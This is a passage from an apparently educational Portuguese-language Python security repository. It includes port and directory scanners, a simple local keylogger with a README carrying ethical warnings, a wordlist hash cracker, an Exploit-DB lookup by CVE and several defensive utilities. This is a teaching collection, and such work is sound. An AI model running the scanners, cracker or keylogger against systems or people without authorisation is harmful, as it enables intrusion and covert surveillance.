data.decode() 26 | info_dict[tag] = data 27 | return info_dict 28 | 29 | 30 | def get_pdf_metadata(pdf_file): 31 | try: 32 | # Abre o PDF 33 | pdf = pikepdf.Pdf.open(pdf_file) 34 | 35 | # Retorna os metadados como um dicionário 36 | return dict(pdf.docinfo) 37 | except Exception as e: 38 | print(f"Erro ao extrair metadados do PDF: {e}") 39 | return {} 40 | 41 | 42 | if __name__ == "__main__": 43 | file = sys.argv[1] 44 | if file.endswith(".pdf"): 45 | print(get_pdf_metadata(file)) 46 | elif file.lower( 47 | 48 | ).endswith((".jpg", ".jpeg", ".png", ".bmp", ".gif", ".tiff")): 49 | pprint(get_image_metadata(file)) 50 | else: 51 | print(f"Unsupported file format: {file}") -------------------------------------------------------------------------------- /codes_shorts/simple_port_scanner.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from concurrent.futures import ThreadPoolExecutor 3 | from colorama import init, Fore 4 | 5 | def socket_validator(host, port): 6 | socket_ = socket.socket() 7 | 8 | try: 9 | socket_.connect((host, port)) 10 | socket_.settimeout(0.1) 11 | return True 12 | except: 13 | return False 14 | 15 | def valid_port_open(host, port, green_color, red_color, reset_color): 16 | 17 | if socket_validator(host, port): 18 | print(f"{green_color}[!] {host}:{port} OPEN {reset_color}") 19 | else: 20 | print(f"{red_color}[#] {host}:{port} CLOSED {reset_color}", end='\r') 21 | 22 | if __name__ == "__main__": 23 | 24 | init() 25 | GREEN_COLOR = Fore.GREEN 26 | RESET_COLOR = Fore.RESET 27 | RED_COLOR = Fore.RED 28 | 29 | HOST = input("HOST: ") 30 | THREADS = 100 31 | 32 | top_ports = [ 33 | 80, # HTTP 34 | 443, # HTTPS 35 | 21, # FTP 36 | 22, # SSH 37 | 23, # Telnet 38 | 25, # SMTP 39 | 53, # DNS 40 | 110, # POP3 41 | 135, # RPC 42 | 139, # NetBIOS 43 | 143, # IMAP 44 | 445, # Microsoft-DS 45 | 3389, # RDP 46 | 3306, # MySQL 47 | 8080, # HTTP alternativo 48 | 5900, # VNC 49 | 1433, # SQL Server 50 | 1521, # Oracle DB 51 | 514 # Syslog 52 | ] 53 | 54 | 55 | print(f"\n[!]Execute Scanning {HOST} using {THREADS} threads[!]\n") 56 | 57 | with ThreadPoolExecutor(max_workers=THREADS) as executor: 58 | for port in range(1, 2500): 59 | executor.submit(valid_port_open, HOST, port, GREEN_COLOR, RED_COLOR, RESET_COLOR) 60 | -------------------------------------------------------------------------------- /keylogger_simple_pt/keylog_simple_pt.py: -------------------------------------------------------------------------------- 1 | import keyboard 2 | import time 3 | 4 | 5 | OUTPUT_FILE = "keyslogger.log" 6 | MAX_LINE_LENGTH = 100 7 | MAX_DELAY = 12 8 | 9 | def write_to_file(buffer): 10 | with open(OUTPUT_FILE, "a", encoding="utf-8") as file: 11 | file.write(buffer + "\n") 12 | 13 | def keylogger_exec(): 14 | buffer = "" 15 | last_time = time.time() 16 | 17 | print("Monitorando teclas. Pressione ESC para sair...") 18 | 19 | while True: 20 | event = keyboard.read_event() 21 | 22 | if event.event_type == keyboard.KEY_DOWN: 23 | current_time = time.time() 24 | char = event.name 25 | 26 | 27 | if char == "esc": 28 | print("Encerrando o monitoramento.") 29 | break 30 | 31 | 32 | if len(char) == 1: 33 | buffer += char 34 | elif char == "space": 35 | buffer += " " 36 | elif char == "enter": 37 | buffer += "\n" 38 | elif char == "backspace" and buffer: 39 | buffer = buffer[:-1] 40 | 41 | 42 | if current_time - last_time > MAX_DELAY or len(buffer) >= MAX_LINE_LENGTH: 43 | write_to_file(buffer) 44 | if len(buffer) >= MAX_LINE_LENGTH: 45 | buffer = buffer[len(buffer) - MAX_LINE_LENGTH:] 46 | else: 47 | buffer = char 48 | 49 | last_time = current_time 50 | 51 | 52 | if buffer: 53 | write_to_file(buffer) 54 | 55 | if __name__ == "__main__": 56 | keylogger_exec() 57 | -------------------------------------------------------------------------------- /simple_port_scan_pt/port_scan_python_todo_dia.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from concurrent.futures import ThreadPoolExecutor 3 | from colorama import init, Fore 4 | 5 | 6 | def socket_validator(host, port): 7 | socket_ = socket.socket() 8 | 9 | try: 10 | socket_.connect((host, port)) 11 | socket_.settimeout(0.1) 12 | return True 13 | except: 14 | return False 15 | 16 | 17 | def valid_port_open(host, port, green_color, red_color, reset_color): 18 | 19 | if socket_validator(host, port): 20 | print(f"{green_color}[!] {host}:{port} OPEN {reset_color}") 21 | else: 22 | print(f"{red_color}[#] {host}:{port} CLOSED {reset_color}", end='\r') 23 | 24 | 25 | 26 | if __name__ == "__main__": 27 | 28 | init() 29 | GREEN_COLOR = Fore.GREEN 30 | RESET_COLOR = Fore.RESET 31 | RED_COLOR = Fore.RED 32 | 33 | HOST = input("HOST: ") 34 | THREADS = 100 35 | 36 | top_ports = [ 37 | 80, # HTTP 38 | 443, # HTTPS 39 | 21, # FTP 40 | 22, # SSH 41 | 23, # Telnet 42 | 25, # SMTP 43 | 53, # DNS 44 | 110, # POP3 45 | 135, # RPC 46 | 139, # NetBIOS 47 | 143, # IMAP 48 | 445, # Microsoft-DS 49 | 3389, # RDP 50 | 3306, # MySQL 51 | 8080, # HTTP alternativo 52 | 5900, # VNC 53 | 1433, # SQL Server 54 | 1521, # Oracle DB 55 | 514 # Syslog 56 | ] 57 | 58 | 59 | print(f"\n[!]Execute Scanning {HOST} using {THREADS} threads[!]\n") 60 | 61 | with ThreadPoolExecutor(max_workers=THREADS) as executor: 62 | for port in range(1, 2500): 63 | executor.submit(valid_port_open, HOST, port, GREEN_COLOR, RED_COLOR, RESET_COLOR) 64 | -------------------------------------------------------------------------------- /generate_password_pt/generate_passwd.py: -------------------------------------------------------------------------------- 1 | import string 2 | import random 3 | import argparse 4 | 5 | 6 | def generate_password(alp_caps=True, alp_lower=True, numbs=True, simbs=True, quant_carac=25): 7 | 8 | options = ( 9 | (string.ascii_uppercase if alp_caps else '') + 10 | (string.ascii_lowercase if alp_lower else '') + 11 | ('123456789' if numbs else '') + 12 | ('[]{}()*;/,_-!@' if simbs else '') 13 | ) 14 | 15 | 16 | if not options: 17 | raise ValueError("Pelo menos uma categoria de caracteres deve ser ativada!") 18 | 19 | return ''.join(random.choices(options, k=quant_carac)) 20 | 21 | 22 | if __name__ == "__main__": 23 | parser = argparse.ArgumentParser(description="Gerador de senhas personalizável") 24 | parser.add_argument("-u", "--uppercase", action="store_true", help="Incluir letras maiúsculas") 25 | parser.add_argument("-l", "--lowercase", action="store_true", help="Incluir letras minúsculas") 26 | parser.add_argument("-n", "--numbers", action="store_true", help="Incluir números") 27 | parser.add_argument("-s", "--symbols", action="store_true", help="Incluir símbolos") 28 | parser.add_argument("-c", "--characters", type=int, default=25, help="Quantidade de caracteres na senha (padrão: 25)") 29 | 30 | args = parser.parse_args() 31 | 32 | try: 33 | password = generate_password( 34 | alp_caps=args.uppercase, 35 | alp_lower=args.lowercase, 36 | numbs=args.numbers, 37 | simbs=args.symbols, 38 | quant_carac=args.characters) 39 | 40 | print(f"{password}") 41 | except ValueError as e: 42 | print("Erro: Você deve habilitar pelo menos uma categoria de caracteres (use -u, -l, -n ou -s).") 43 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/4_CAP_Paramiko/exemplo_reinicializacao_de_service_remot.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | 3 | def restart_service(ip, username, password, service_name): 4 | """Reinicia um serviço remoto via SSH.""" 5 | try: 6 | # Inicializa o cliente SSH 7 | client = paramiko.SSHClient() 8 | 9 | # Permite aceitar automaticamente a chave SSH do host remoto 10 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 11 | 12 | # Estabelece a conexão SSH com o host remoto 13 | client.connect(ip, username=username, password=password) 14 | 15 | # Comando remoto para reiniciar o serviço 16 | command = f"sudo systemctl restart {service_name}" 17 | 18 | # Executa o comando no servidor remoto 19 | stdin, stdout, stderr = client.exec_command(command) 20 | 21 | # Exibe a saída padrão (stdout) do comando 22 | output = stdout.read().decode().strip() 23 | erro = stderr.read().decode().strip() 24 | 25 | if output: 26 | print(f"[+] Saída: {output}") 27 | if erro: 28 | print(f"[-] Erro: {erro}") 29 | else: 30 | print(f"[+] O serviço '{service_name}' foi reiniciado com sucesso.") 31 | 32 | # Fecha a conexão SSH 33 | client.close() 34 | 35 | except Exception as e: 36 | print(f"[-] Falha ao reiniciar o serviço: {e}") 37 | 38 | if __name__ == "__main__": 39 | ip = input("Digite o endereço IP do servidor: ") 40 | usuario = input("Digite o nome de usuário: ") 41 | senha = input("Digite a senha: ") 42 | servico = input("Digite o nome do serviço a ser reiniciado (ex: apache2, nginx, mysql): ") 43 | 44 | restart_service(ip, usuario, senha, servico) 45 | -------------------------------------------------------------------------------- /simple_scan_direct_pt/director_scan_python_todo_dia.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from concurrent.futures import ThreadPoolExecutor 3 | from colorama import init, Fore 4 | 5 | 6 | def request_validator(direct, host): 7 | try: 8 | response = requests.get(f"https://{host}/{direct}", timeout=1.5) 9 | status_code_ = response.status_code 10 | 11 | if status_code_ == 200: 12 | return True, status_code_ 13 | else: 14 | return False, status_code_ 15 | 16 | except Exception as error: 17 | return f'[ERROR] - {error}' 18 | 19 | 20 | def execute_direct_scan(direct, host, positive_color, negative_color, reset_color): 21 | 22 | request_validator_, status_code_ = request_validator(direct, host) 23 | 24 | if request_validator_: 25 | print(f"{positive_color}[!!] https://{host}/{direct} | [{status_code_}] {reset_color}") 26 | else: 27 | print(f"{negative_color}[//] https://{host}/{direct} | [{status_code_}] {reset_color}", end="\r") 28 | 29 | 30 | if __name__ == "__main__": 31 | init() 32 | GREEN_COLOR = Fore.GREEN 33 | RESET_COLOR = Fore.RESET 34 | RED_COLOR = Fore.RED 35 | 36 | HOST = input("[$] HOST: ") 37 | LIST_DIRECT = input("[$] LIST_DIRECT: ") 38 | THREADS = input("[$] THREADS: ") 39 | 40 | list_to_read = open(fr"{LIST_DIRECT}", 'r', 41 | encoding='utf-8').read().splitlines() 42 | 43 | print(f"\n[#] EXECUTING DIRECTORY SCAN -> {HOST} USING {THREADS} THREADS [#] \n") 44 | 45 | with ThreadPoolExecutor(max_workers=int(THREADS)) as executor: 46 | for dct in list_to_read: 47 | executor.submit(execute_direct_scan, 48 | dct, HOST, 49 | GREEN_COLOR, RED_COLOR, RESET_COLOR) -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/5_CAP_Cryptography/exemplo_de_cript_e_descript_AES.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | import os 4 | 5 | def encrypt_message(key, plaintext): 6 | """Criptografa uma mensagem usando AES.""" 7 | 8 | # Gera um IV (Vetor de Inicialização) aleatório 9 | iv = os.urandom(16) 10 | 11 | # Cria uma instância do algoritmo AES no modo CFB 12 | cipher = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend()) 13 | encryptor = cipher.encryptor() 14 | 15 | # Criptografa a mensagem e concatena com o IV 16 | ciphertext = encryptor.update(plaintext.encode()) + encryptor.finalize() 17 | return iv + ciphertext 18 | 19 | def decrypt_message(key, encrypted_data): 20 | """Descriptografa uma mensagem criptografada com AES.""" 21 | 22 | # Extrai o IV dos primeiros 16 bytes 23 | iv = encrypted_data[:16] 24 | ciphertext = encrypted_data[16:] 25 | 26 | # Inicializa o algoritmo AES para descriptografar 27 | cipher = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend()) 28 | decryptor = cipher.decryptor() 29 | 30 | # Descriptografa a mensagem e retorna como texto 31 | plaintext = decryptor.update(ciphertext) + decryptor.finalize() 32 | return plaintext.decode() 33 | 34 | if __name__ == "__main__": 35 | # Gera uma chave AES de 256 bits 36 | key = os.urandom(32) 37 | 38 | mensagem = input("Digite a mensagem para criptografar: ") 39 | encrypted_data = encrypt_message(key, mensagem) 40 | print(f"\nMensagem criptografada: {encrypted_data.hex()}") 41 | 42 | decrypted_data = decrypt_message(key, encrypted_data) 43 | print(f"\nMensagem descriptografada: {decrypted_data}") 44 | -------------------------------------------------------------------------------- /cve_finder/find_exploit.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import json 3 | import csv 4 | 5 | def buscar_detalhes_exploitdb(cve_id): 6 | try: 7 | resultado = subprocess.check_output(['searchsploit', '--cve', cve_id, '-j'], stderr=subprocess.DEVNULL) 8 | dados = json.loads(resultado.decode()) 9 | return dados['RESULTS_EXPLOIT'] if dados['RESULTS_EXPLOIT'] else None 10 | except Exception: 11 | return None 12 | 13 | def carregar_lista_cves(caminho_arquivo): 14 | with open(caminho_arquivo, 'r') as f: 15 | return [linha.strip() for linha in f if linha.strip()] 16 | 17 | def salvar_resultado_csv(resultados, nome_arquivo='resultado_exploits.csv'): 18 | with open(nome_arquivo, 'w', newline='') as csvfile: 19 | writer = csv.writer(csvfile) 20 | writer.writerow(['CVE', 'Exploit(s)']) 21 | for cve, exploits in resultados.items(): 22 | if exploits: 23 | for exploit in exploits: 24 | writer.writerow([cve, f"{exploit['Title']} ({exploit['Path']})"]) 25 | else: 26 | writer.writerow([cve, 'No Exploit']) 27 | 28 | def main(): 29 | caminho_arquivo = 'list_cves_to_verify.txt' # Arquivo com CVEs, uma por linha 30 | cves = carregar_lista_cves(caminho_arquivo) 31 | resultados = {} 32 | 33 | print("[*] Verificando exploits no Exploit-DB...") 34 | for cve in cves: 35 | print(f" - {cve}...", end=' ') 36 | exploits = buscar_detalhes_exploitdb(cve) 37 | if exploits: 38 | print(f"{len(exploits)} encontrado(s).") 39 | else: 40 | print("Nenhum exploit encontrado.") 41 | resultados[cve] = exploits 42 | 43 | salvar_resultado_csv(resultados) 44 | print("\n[+] Verificação concluída. Arquivo 'resultado_exploits.csv' gerado com sucesso.") 45 | 46 | if __name__ == '__main__': 47 | main() 48 | -------------------------------------------------------------------------------- /securit_headers_mb/secur_headers.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def validate_security_headers(url): 4 | 5 | required_headers = { 6 | "Strict-Transport-Security": "Forçar HTTPS", 7 | "Content-Security-Policy": "Previne ataques de XSS e de injeção", 8 | "X-Content-Type-Options": "Contra ataques de MIME sniffing", 9 | "X-Frame-Options": "Prevenção de iframes não autorizados", 10 | "X-XSS-Protection": "Contra XSS no navegador", 11 | "Referrer-Policy": "Controla as informações enviadas no cabeçalho Referer", 12 | "Permissions-Policy": "Restringe o uso de APIs sensíveis" 13 | } 14 | 15 | results = {} 16 | try: 17 | 18 | response = requests.head(url, allow_redirects=False, timeout=10) 19 | headers = response.headers 20 | 21 | for header, description in required_headers.items(): 22 | if header in headers: 23 | results[header] = {"status": "[!!] PRESENT", "value": headers[header]} 24 | else: 25 | results[header] = {"status": "[//] NOT PRESENT", "description": description} 26 | 27 | return results 28 | 29 | except requests.exceptions.RequestException as e: 30 | return f"[ERROR] - {e}\n[//] Verify your input please\nExample - https://google.com" 31 | 32 | 33 | 34 | if __name__ == "__main__": 35 | 36 | URL = input("[$] URL: ") 37 | 38 | security_results = validate_security_headers(URL) 39 | 40 | print("\n[!] Executindo search in crt.sh [!]\n[!!] If anything data return, please consult again [!!]\n") 41 | 42 | print("====================================================") 43 | 44 | for header, info in security_results.items(): 45 | if "status" in info: 46 | print(f"{header}: {info['status']}") 47 | else: 48 | print(f"{header}: {info}") 49 | 50 | print("====================================================") -------------------------------------------------------------------------------- /cve_finder/cve_descriptions.py: -------------------------------------------------------------------------------- 1 | import nvdlib 2 | 3 | KEY = "YOUR KEY" 4 | 5 | 6 | def _display_cve(cve): 7 | """ 8 | Exibe as informações de uma CVE de forma estruturada. 9 | 10 | :param cve: Objeto CVE retornado pela biblioteca nvdlib. 11 | """ 12 | id_cve = f"[!] ID: {cve.id}" 13 | description = f"[!] Description: {cve.descriptions[0].value}" 14 | date_publ = f"[!] Data de publication: {cve.published}" 15 | last_update = f"[!] Last modification: {cve.lastModified}" 16 | link = f"[!] Link: https://nvd.nist.gov/vuln/detail/{cve.id}" 17 | if hasattr(cve, 'v31score'): 18 | score_cvss31 = f"[!][!] Score CVSS v3.1: {cve.v31score} ({cve.v31severity})" 19 | else: 20 | score_cvss31 = '' 21 | 22 | if hasattr(cve, 'v30score'): 23 | score_cvss30 = f"[!][!] Score CVSS v3.0: {cve.v30score} ({cve.v30severity})" 24 | else: 25 | score_cvss30 = '' 26 | 27 | if hasattr(cve, 'v2score'): 28 | score_cv2score = f"[!][!] Score CVSS v2: {cve.v2score} ({cve.v2severity})" 29 | else: 30 | score_cv2score = '' 31 | 32 | return id_cve, description, date_publ, last_update, link, score_cvss31, score_cvss30, score_cv2score 33 | 34 | 35 | cve_list = open('CVEs_not_duplicated_25_04_2025.txt').read().splitlines() 36 | 37 | 38 | for cve in cve_list: 39 | results = nvdlib.searchCVE(cveId=cve, key=KEY)[0] 40 | 41 | id_cve_, description_, date_publ_, last_update_, link_, score_cvss31_, score_cvss30_, score_cv2score_ = _display_cve(results) 42 | 43 | build_infos = f'{description_}|{date_publ_}|{last_update_}|{link_}|{score_cvss31_}|{score_cvss30_}|{score_cv2score_}' 44 | 45 | print(build_infos) 46 | 47 | with open('CVE_INFOS_25_04_2025.txt', 'a', encoding='utf-8') as file: 48 | file.write(f'{id_cve_}|{build_infos}' + '\n') -------------------------------------------------------------------------------- /hashkiller_pt/hashk_pt.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import argparse 3 | from colorama import init, Fore 4 | 5 | 6 | def haskiller_mb_pt(hash_value, wordlist_path, hash_type, positive_c, negative_c, reset_c): 7 | try: 8 | 9 | hash_algorithms = { 10 | 'md5': hashlib.md5, 11 | 'sha1': hashlib.sha1, 12 | 'sha224': hashlib.sha224, 13 | 'sha256': hashlib.sha256, 14 | 'sha384': hashlib.sha384, 15 | 'sha512': hashlib.sha512, 16 | 'blake2b': hashlib.blake2b, 17 | 'blake2s': hashlib.blake2s, 18 | } 19 | 20 | algorthm_name = hash_type.lower() 21 | if algorthm_name not in hash_algorithms: 22 | raise ValueError(f"[//] Algorithm {algorthm_name} not supported") 23 | 24 | 25 | with open(fr'{wordlist_path}', 'r') as file: 26 | hash_function = hash_algorithms[algorthm_name] 27 | 28 | 29 | for line in file: 30 | word = line.strip() 31 | hash_done = hash_function(word.encode()).hexdigest() 32 | 33 | 34 | print(f"{reset_c}[TRY] {hash_value} X {hash_done}/{word} {reset_c}") 35 | 36 | 37 | if hash_done == hash_value: 38 | print(f"\n{positive_c}[FIND] {hash_value}/{word} X {hash_done}/{word} {reset_c}\n") 39 | return # 40 | print(f"{negative_c}[NOT FOUND] Hash não encontrado na wordlist.{reset_c}") 41 | 42 | except Exception as error: 43 | print(f"{negative_c}\n[ERROR] - {error} {reset_c}\n") 44 | 45 | 46 | if __name__ == "__main__": 47 | init() 48 | GREEN_COLOR = Fore.GREEN 49 | RESET_COLOR = Fore.RESET 50 | RED_COLOR = Fore.RED 51 | 52 | 53 | parser = argparse.ArgumentParser(description="Hash Killer Script") 54 | parser.add_argument("--hash", required=True, help="The target hash to crack") 55 | parser.add_argument("--wordlist", required=True, help="Path to the wordlist file") 56 | parser.add_argument("--type", required=True, help="Type of the hash (e.g., md5, sha256)") 57 | 58 | args = parser.parse_args() 59 | 60 | 61 | haskiller_mb_pt( 62 | hash_value=args.hash, 63 | wordlist_path=args.wordlist, 64 | hash_type=args.type, 65 | positive_c=GREEN_COLOR, 66 | negative_c=RED_COLOR, 67 | reset_c=RESET_COLOR, 68 | ) 69 | -------------------------------------------------------------------------------- /flag_secure_validator/flag_secure_pt.py: -------------------------------------------------------------------------------- 1 | import os 2 | import zipfile 3 | import re 4 | import xml.etree.ElementTree as ET 5 | 6 | # === CONFIGURAÇÃO === 7 | APK_PATH = "app_01.apk" # Caminho do APK a ser analisado 8 | EXTRACT_PATH = "apk_extracted" 9 | 10 | # === FUNÇÃO PARA EXTRAIR O APK === 11 | def extract_apk(apk_path, extract_path): 12 | if not os.path.exists(extract_path): 13 | os.makedirs(extract_path) 14 | with zipfile.ZipFile(apk_path, 'r') as apk: 15 | apk.extractall(extract_path) 16 | print(f"[+] APK extraído em: {extract_path}") 17 | 18 | # === FUNÇÃO PARA ANALISAR REFERÊNCIAS FLAG_SECURE NOS .DEX === 19 | def search_flag_secure_in_dex(extract_path): 20 | dex_files = [f for f in os.listdir(extract_path) if f.endswith(".dex")] 21 | results = [] 22 | for dex in dex_files: 23 | with open(os.path.join(extract_path, dex), "rb") as f: 24 | content = f.read() 25 | matches = re.findall(b"FLAG_SECURE", content) 26 | if matches: 27 | results.append((dex, len(matches))) 28 | return results 29 | 30 | # === FUNÇÃO PARA ANALISAR O ANDROIDMANIFEST.XML === 31 | def analyze_manifest(extract_path): 32 | manifest_path = os.path.join(extract_path, "AndroidManifest.xml") 33 | try: 34 | # Parse básico (o Manifest vem binário no APKTool, mas em alguns APKs já está legível) 35 | tree = ET.parse(manifest_path) 36 | root = tree.getroot() 37 | activities = [] 38 | for elem in root.iter(): 39 | if 'activity' in elem.tag: 40 | activities.append(elem.attrib) 41 | return activities 42 | except Exception as e: 43 | return f"[!] Não foi possível analisar o Manifest diretamente: {e}" 44 | 45 | # === EXECUÇÃO === 46 | if __name__ == "__main__": 47 | if not os.path.exists(APK_PATH): 48 | print(f"[ERRO] APK não encontrado em {APK_PATH}") 49 | exit(1) 50 | 51 | extract_apk(APK_PATH, EXTRACT_PATH) 52 | 53 | print("\n[1] Analisando referências a FLAG_SECURE nos arquivos DEX...") 54 | flag_results = search_flag_secure_in_dex(EXTRACT_PATH) 55 | if flag_results: 56 | for dex, count in flag_results: 57 | print(f" - Encontrado {count} referência(s) em {dex}") 58 | else: 59 | print(" [-] Nenhuma referência a FLAG_SECURE encontrada nos DEX.") 60 | 61 | print("\n[2] Analisando AndroidManifest.xml...") 62 | manifest_activities = analyze_manifest(EXTRACT_PATH) 63 | if isinstance(manifest_activities, list): 64 | print(f" [+] {len(manifest_activities)} atividades encontradas no Manifest.") 65 | for act in manifest_activities: 66 | print(f" - {act}") 67 | else: 68 | print(manifest_activities) 69 | 70 | print("\n[✅] Análise concluída!") 71 | -------------------------------------------------------------------------------- /keylogger_simple_pt/understand_script.md: -------------------------------------------------------------------------------- 1 | # README - Keylogger Script 2 | 3 | ## Introdução 4 | 5 | Este script de keylogger tem como objetivo registrar todas as teclas pressionadas em um computador em um arquivo de log. Ele monitora eventos de teclado e grava a entrada em tempo real, registrando até que a tecla "ESC" seja pressionada, encerrando o monitoramento. 6 | 7 | ## Objetivo 8 | 9 | O objetivo principal deste script é capturar as teclas pressionadas e armazená-las em um arquivo de log (`keyslogger.log`). Esse tipo de ferramenta pode ser útil em situações de diagnóstico, testes ou, com o devido propósito, em ambientes controlados e permitidos. 10 | 11 | ## Como Funciona 12 | 13 | 1. **Leitura de Eventos de Teclado** 14 | O script utiliza a biblioteca `keyboard` para capturar eventos de teclado em tempo real. Ele monitora eventos `KEY_DOWN`, registrando cada tecla pressionada. 15 | 16 | 2. **Gravação Contínua** 17 | A cada tecla pressionada, o script adiciona o caractere à `buffer` (linha temporária de armazenamento). Se a tecla pressionada for "esc", o script encerra a execução. 18 | 19 | 3. **Limitações e Raciocínio do Buffer** 20 | - **MAX_DELAY**: Após um período de inatividade (definido em segundos, `MAX_DELAY`), o script força a gravação da buffer para evitar que teclas não digitadas se acumulem indefinidamente. 21 | - **MAX_LINE_LENGTH**: Limita o tamanho de cada linha no arquivo de log. Quando o limite é atingido, o conteúdo da buffer é registrado e a buffer é limpa para começar novamente. 22 | 23 | 4. **Caracteres Comuns e suas Mapeações** 24 | - `char == "space"`: Substitui espaços por um caractere espaço. 25 | - `char == "enter"`: Substitui a tecla "Enter" por uma quebra de linha (`\n`). 26 | - `char == "backspace"`: Remove o último caractere da buffer, se houver. 27 | 28 | 5. **Especificidade da Arquivação** 29 | - Após cada gravação, se a buffer for maior que o limite de caracteres, ela é truncada. 30 | - A gravação contínua evita acúmulo de dados desnecessários, mantendo o desempenho otimizado. 31 | 32 | 6. **Encerramento do Script** 33 | - O script monitora constantemente até que a tecla "esc" seja pressionada. Isso interrompe o processo e escreve a buffer final para o arquivo antes de finalizar. 34 | 35 | ## Estrutura do Código 36 | 37 | ### Variáveis Globais 38 | 39 | - **`OUTPUT_FILE`**: Nome do arquivo onde as teclas digitadas serão registradas (`keyslogger.log`). 40 | - **`MAX_LINE_LENGTH`**: Tamanho máximo das linhas no arquivo de log. 41 | - **`MAX_DELAY`**: Tempo máximo em segundos sem entrada de teclado antes de forçar a gravação. 42 | 43 | ### Função `write_to_file(buffer)` 44 | 45 | - **Descrição**: Grava o conteúdo da buffer no arquivo de log especificado. 46 | - **Uso**: É chamada periodicamente para armazenar os caracteres digitados, respeitando os limites de tempo e tamanho. 47 | 48 | ### Função `keylogger_exec()` 49 | 50 | - **Descrição**: Responsável por monitorar e processar os eventos do teclado. 51 | - **Logica Complexa**: 52 | - A lógica de gravação considera tanto o tempo (`MAX_DELAY`) como o tamanho da buffer (`MAX_LINE_LENGTH`). 53 | - Processa diferentes tipos de eventos de teclado, tratando de forma específica teclas como `space`, `enter`, e `backspace`. 54 | - Quando a buffer excede o limite de caracteres ou o tempo de inatividade, escreve no arquivo. 55 | - Continua capturando teclas até que a tecla "esc" seja pressionada para parar o loop. 56 | 57 | ### `if __name__ == "__main__":` 58 | 59 | - **Descrição**: Serve como ponto de entrada principal do script. Chama a função `keylogger_exec()` para iniciar o monitoramento. 60 | 61 | --- 62 | 63 | ## Exemplo de Execução 64 | 65 | 1. Certifique-se de instalar a biblioteca `keyboard`: 66 | ```bash 67 | pip install keyboard 68 | 69 | 70 | Considerações de Segurança 71 | Propósito: Este script deve ser usado com responsabilidade e em conformidade com as políticas legais e éticas locais. O uso indevido pode infringir a privacidade das pessoas e comprometer a segurança. 72 | Autorização: Certifique-se de ter a devida permissão para utilizar este script em ambientes de trabalho ou dispositivos. 73 | Privacidade: Evite o uso em computadores sem consentimento, pois isso pode violar a privacidade das pessoas. 74 | -------------------------------------------------------------------------------- /client_server_send_file_pt/understand_code.md: -------------------------------------------------------------------------------- 1 | # Sistema de Transferência de Arquivos via Socket 2 | 3 | Este repositório contém dois scripts para transferência de arquivos utilizando sockets em Python. Os scripts são: 4 | 5 | 1. **Cliente (`client.py`)**: Envia arquivos para um servidor. 6 | 2. **Servidor (`server.py`)**: Recebe e armazena arquivos enviados pelo cliente. 7 | 8 | --- 9 | 10 | ## 📋 Funcionamento 11 | 12 | ### 1. **`client.py`** 13 | O script do cliente permite ao usuário enviar arquivos para o servidor. 14 | 15 | #### **Detalhamento do Código** 16 | 17 | ##### Variáveis Principais: 18 | - **`HOST`**: Endereço IP do servidor ao qual o cliente se conecta. Por padrão, `127.0.0.1` (localhost). 19 | - **`PORT`**: Porta utilizada para a conexão. Padrão: `5000`. 20 | - **`BUFFER_SIZE`**: Tamanho do buffer para transmissão de dados. Padrão: `4096` bytes. 21 | - **`MAX_FILE_SIZE`**: Tamanho máximo permitido para envio de arquivos (100 MB). 22 | 23 | ##### **Funções** 24 | - **`send_file(client_socket, filename)`**: 25 | - Envia um arquivo para o servidor. 26 | - Verifica se o arquivo existe e se o tamanho é permitido. 27 | - Envia o nome e o tamanho do arquivo ao servidor, seguido pelo conteúdo do arquivo em blocos de tamanho `BUFFER_SIZE`. 28 | - **Exemplo de Uso:** 29 | ```python 30 | send_file(client_socket, 'meuarquivo.txt') 31 | ``` 32 | 33 | ##### **Fluxo Principal** 34 | 1. Conecta ao servidor utilizando `socket.socket`. 35 | 2. Solicita ao usuário o caminho do arquivo a ser enviado ou o comando `sair` para encerrar. 36 | 3. Verifica se o caminho do arquivo é válido. Caso seja, chama `send_file`. 37 | 4. Envia o comando `EXIT` para encerrar a conexão. 38 | 39 | --- 40 | 41 | ### 2. **`server.py`** 42 | O script do servidor recebe os arquivos enviados pelo cliente e os armazena em um diretório específico. 43 | 44 | #### **Detalhamento do Código** 45 | 46 | ##### Variáveis Principais: 47 | - **`HOST`**: Endereço IP onde o servidor escutará conexões. Padrão: `0.0.0.0` (todas as interfaces). 48 | - **`PORT`**: Porta utilizada para a conexão. Padrão: `5000`. 49 | - **`BUFFER_SIZE`**: Tamanho do buffer para transmissão de dados. Padrão: `4096` bytes. 50 | - **`SAVE_DIR`**: Diretório onde os arquivos recebidos serão armazenados. Padrão: `recebidos/`. 51 | 52 | ##### **Fluxo Principal** 53 | 1. Cria o diretório `SAVE_DIR` caso não exista. 54 | 2. Configura o servidor para escutar conexões com `socket.socket`. 55 | 3. Aceita a conexão de um cliente e exibe o endereço do cliente conectado. 56 | 4. Aguarda mensagens do cliente: 57 | - Recebe o nome do arquivo e confirma recebimento. 58 | - Recebe o tamanho do arquivo e confirma recebimento. 59 | - Lê o conteúdo do arquivo em blocos de tamanho `BUFFER_SIZE` e salva no diretório especificado. 60 | - Encerra a conexão ao receber o comando `EXIT`. 61 | 62 | --- 63 | 64 | ## 📂 Estrutura de Arquivos 65 | 66 | ```plaintext 67 | . 68 | ├── client.py # Script do cliente para envio de arquivos 69 | ├── server.py # Script do servidor para recepção de arquivos 70 | └── recebidos/ # Diretório para armazenar arquivos recebidos (criado automaticamente pelo servidor) 71 | ``` 72 | 73 | --- 74 | 75 | ## 🛠️ Como Usar 76 | 77 | ### Passo 1: Configurar o Servidor 78 | 1. Certifique-se de que o Python 3 está instalado. 79 | 2. Execute o script do servidor: 80 | ```bash 81 | python server.py 82 | ``` 83 | 3. O servidor estará aguardando conexões na porta `5000`. 84 | 85 | ### Passo 2: Enviar Arquivos com o Cliente 86 | 1. Certifique-se de que o Python 3 está instalado. 87 | 2. Execute o script do cliente: 88 | ```bash 